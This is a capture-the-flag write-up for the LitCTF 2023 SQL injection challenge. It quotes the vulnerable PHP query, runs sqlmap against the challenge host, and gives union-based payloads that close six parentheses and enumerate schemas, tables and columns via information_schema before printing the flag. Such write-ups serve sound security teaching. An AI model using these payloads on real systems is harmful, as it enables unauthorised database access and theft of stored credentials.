
[LitCTF 2023] What is this? SQL! Just inject it!

Cybersecurity

The page is an input box plus a hint.
The key part of the source is given:

<?php
// $_GET["id"] is concatenated straight into the query, unescaped and unquoted,
// wrapped in six layers of parentheses. This is the challenge's intended bug.
$sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
$result = $conn->query($sql);

sqlmap

python sqlmap.py -u "http://node5.anna.nssctf.cn:25805/?id=1" --dbs

For details see 通过sqlmap拿下数据库.md (taking over the database with sqlmap).

Initial attempt

Try entering 1

# Response:
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((1))))))
Array ( 
[0] => Array ( 
    [username] => tanji 
    [password] => OHHHHHHH 
    ) 
)

The id is wrapped in many parentheses, so close all six and comment out the ones the server appends: id = 1)))))) or 1=1#
(When sending this through the URL bar rather than the form, the # has to be URL-encoded as %23, otherwise the browser treats it as a fragment and it never reaches the server.)
The query on the backend becomes

SELECT username,password FROM users WHERE id = ((((((1)))))) or 1=1#))))))
# Response:
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((1)))))) or 1=1#))))))
Array ( 
[0] => Array ( 
    [username] => tanji 
    [password] => OHHHHHHH 
    ) 
[1] => Array ( 
    [username] => fake_flag 
    [password] => F1rst_to_Th3_eggggggggg!} (4/4) 
    ) 
)

or 1=1 dumps the whole users table, and the second row is fake_flag, so the answer is not here.

Get database information

# payload
id=1)))))) union select 1,group_concat(schema_name) from information_schema.schemata#
# Response:
Array ( 
[0] => Array ( 
    [username] => tanji 
    [password] => OHHHHHHH 
    ) 
[1] => Array ( 
    [username] => 1 
    [password] => information_schema,mysql,ctftraining,performance_schema,test,ctf 
    ) 
)

Databases:

  • information_schema
  • mysql
  • ctftraining
  • performance_schema
  • test
  • ctf

Get table names

Read the table names of each database one at a time. The flag is in the ctftraining database, so that one is used for the demonstration.

# payload
?id=1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#
# Response:
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#))))))

Array ( 
[0] => Array ( 
    [username] => tanji 
    [password] => OHHHHHHH 
    ) 
[1] => Array ( 
    [username] => 1 
    [password] => flag,news,users 
    ) 
)

The flag table is found.

Get columns

# payload
?id=1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining'#
# Response:
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining'#))))))

Array ( 
[0] => Array ( 
    [username] => tanji 
    [password] => OHHHHHHH 
    ) 
[1] => Array ( 
    [username] => 1 
    [password] => flag,id,title,content,time,id,username,password,ip,time 
    ) 
)

The flag column is found. Because the WHERE clause only filtered on table_schema, the columns of news and users are mixed into the list as well; adding and table_name='flag' would return just flag.

Get the flag

# payload
?id=1)))))) union select 1,flag from ctftraining.flag#
# Response:
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((1))))))union select 1,flag from ctftraining.flag#))))))

Array ( 
[0] => Array ( 
    [username] => tanji 
    [password] => OHHHHHHH 
    ) 
[1] => Array ( 
    [username] => 1 
    [password] => NSSCTF{26433a18-4388-4bd5-865f-d09f2a2443e4} 
    ) 
)

flag:NSSCTF{26433a18-4388-4bd5-865f-d09f2a2443e4}